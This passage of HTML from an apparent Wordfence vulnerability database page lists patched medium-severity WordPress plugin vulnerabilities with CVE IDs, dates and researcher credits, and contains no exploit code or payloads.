<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89138" target="_blank" rel="noopener noreferrer">							CVE-2026-89138						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filter-gallery" target="_blank" rel="noopener">Filter Gallery</a> <span class="wfvr-software-slug">[filter-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73577a0d-8aac-4369-8022-98c198f79224" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0143b789-06ea-47da-9736-3266f91a9e33" target="_blank" rel="noopener">Flex Import &lt;= 3.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Modification via &#8216;license_activate_fleximp&#8217; and &#8216;license_deactivate_fleximp&#8217; AJAX Actions</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9615" target="_blank" rel="noopener noreferrer">							CVE-2026-9615						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flex-import" target="_blank" rel="noopener">Flex Import</a> <span class="wfvr-software-slug">[flex-import]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5ddf9d14fe3d5ebed8efd101f21a9e12.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ddf9d14fe3d5ebed8efd101f21a9e12"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener">Benedictus Jovan (aillesiM)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0143b789-06ea-47da-9736-3266f91a9e33" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/744a902e-d4fd-4159-9e68-dbb167573793" target="_blank" rel="noopener">FluentBoards &lt;= 2.0.14 &#8211; Authenticated (Board Member+) Comment Author Spoofing</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89327" target="_blank" rel="noopener noreferrer">							CVE-2026-89327						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</a> <span class="wfvr-software-slug">[fluent-boards]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf5907d5170a7200adc6f07076350d97.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf5907d5170a7200adc6f07076350d97"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener">vuxvinh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/744a902e-d4fd-4159-9e68-dbb167573793" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d130af27-cc17-4207-9084-15bbc56267b9" target="_blank" rel="noopener">FluentBoards &lt;= 2.0.14 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85349" target="_blank" rel="noopener noreferrer">							CVE-2026-85349						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</a> <span class="wfvr-software-slug">[fluent-boards]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d130af27-cc17-4207-9084-15bbc56267b9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/71366213-79d8-4ab3-8ac5-f071b3f40248" target="_blank" rel="noopener">FluentBoards &lt;= 2.0.14 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89328" target="_blank" rel="noopener noreferrer">							CVE-2026-89328						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</a> <span class="wfvr-software-slug">[fluent-boards]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf5907d5170a7200adc6f07076350d97.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf5907d5170a7200adc6f07076350d97"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener">vuxvinh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/71366213-79d8-4ab3-8ac5-f071b3f40248" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10864109-8155-414e-be96-58e4dc2401b1" target="_blank" rel="noopener">Foxtool All-in-One: Contact chat button, Custom login, Media optimize images &lt;= 2.5.3 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Settings Modification via &#8216;option_key&#8217; Parameter of toggle_watermark AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18317" target="_blank" rel="noopener noreferrer">							CVE-2026-18317						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/foxtool" target="_blank" rel="noopener">Foxtool All-in-One: Contact chat button, Custom login, Media optimize images</a> <span class="wfvr-software-slug">[foxtool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10864109-8155-414e-be96-58e4dc2401b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d5e45a2-012d-4ccf-a93d-553916f75777" target="_blank" rel="noopener">Hydra Booking &lt;= 1.2.1 &#8211; Authenticated (Hydra Host+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92420" target="_blank" rel="noopener noreferrer">							CVE-2026-92420						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hydra-booking" target="_blank" rel="noopener">Hydra Booking — Appointment Scheduling &amp; Booking Calendar</a> <span class="wfvr-software-slug">[hydra-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d5e45a2-012d-4ccf-a93d-553916f75777" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e285eb46-031a-4be9-85c8-a904e076d46e" target="_blank" rel="noopener">Hydra Booking &lt;= 1.2.2 &#8211; Authenticated (Hydra Host+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92421" target="_blank" rel="noopener noreferrer">							CVE-2026-92421						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hydra-booking" target="_blank" rel="noopener">Hydra Booking — Appointment Scheduling &amp; Booking Calendar</a> <span class="wfvr-software-slug">[hydra-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ossacip-thanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45acf8b492a9823d9b6f95bcc17730f3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45acf8b492a9823d9b6f95bcc17730f3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ossacip-thanh" target="_blank" rel="noopener">Ossacip Thanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e285eb46-031a-4be9-85c8-a904e076d46e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/80a385bc-809b-4fcd-8a5c-957c9f897c13" target="_blank" rel="noopener">Hydra Booking &lt;= 1.2.3 &#8211; Authenticated (Hydra Host+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92425" target="_blank" rel="noopener noreferrer">							CVE-2026-92425						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hydra-booking" target="_blank" rel="noopener">Hydra Booking — Appointment Scheduling &amp; Booking Calendar</a> <span class="wfvr-software-slug">[hydra-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stefan-spasic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/75698b97c64a6b5345830f1a03081c09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="75698b97c64a6b5345830f1a03081c09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stefan-spasic" target="_blank" rel="noopener">Stefan Spasic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/80a385bc-809b-4fcd-8a5c-957c9f897c13" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df2eefe5-5a37-475f-a042-1ad368ba04c1" target="_blank" rel="noopener">Invisible Anti-Spam &amp; CAPTCHA &lt;= 5.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91010" target="_blank" rel="noopener noreferrer">							CVE-2026-91010						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-compliant-recaptcha-for-all-forms" target="_blank" rel="noopener">Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms</a> <span class="wfvr-software-slug">[gdpr-compliant-recaptcha-for-all-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df2eefe5-5a37-475f-a042-1ad368ba04c1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e8a182e-036d-4be0-a5c3-fb29009fc17b" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers &lt;= 3.1.3 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74005" target="_blank" rel="noopener noreferrer">							CVE-2026-74005						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers</a> <span class="wfvr-software-slug">[organize-series]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e8a182e-036d-4be0-a5c3-fb29009fc17b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/381afedf-f7a3-4281-9cac-a2c3e3ccffea" target="_blank" rel="noopener">King Addons for Elementor &lt;= 51.1.80 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84903" target="_blank" rel="noopener noreferrer">							CVE-2026-84903						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/king-addons" target="_blank" rel="noopener">King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder</a> <span class="wfvr-software-slug">[king-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/381afedf-f7a3-4281-9cac-a2c3e3ccffea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1920b343-f0fb-47f0-ad87-27d600b7ac80" target="_blank" rel="noopener">King Addons for Elementor 51.1.56 &#8211; 51.1.80 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84904" target="_blank" rel="noopener noreferrer">							CVE-2026-84904						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/king-addons" target="_blank" rel="noopener">King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder</a> <span class="wfvr-software-slug">[king-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1920b343-f0fb-47f0-ad87-27d600b7ac80" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d80ed885-43f8-43a4-bc61-e9ef92e3207e" target="_blank" rel="noopener">LatePoint &#8211; Appointment Booking &amp; Scheduling &lt;= 5.6.9 &#8211; Unauthenticated Insecure Direct Object Reference to Sensitive Information Disclosure via &#8216;customer[id]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18441" target="_blank" rel="noopener noreferrer">							CVE-2026-18441						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/latepoint-2" target="_blank" rel="noopener">Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress</a> <span class="wfvr-software-slug">[latepoint]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b2c7419e5c28acc276078327dd3fb37b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b2c7419e5c28acc276078327dd3fb37b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorra" target="_blank" rel="noopener">Sorra</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
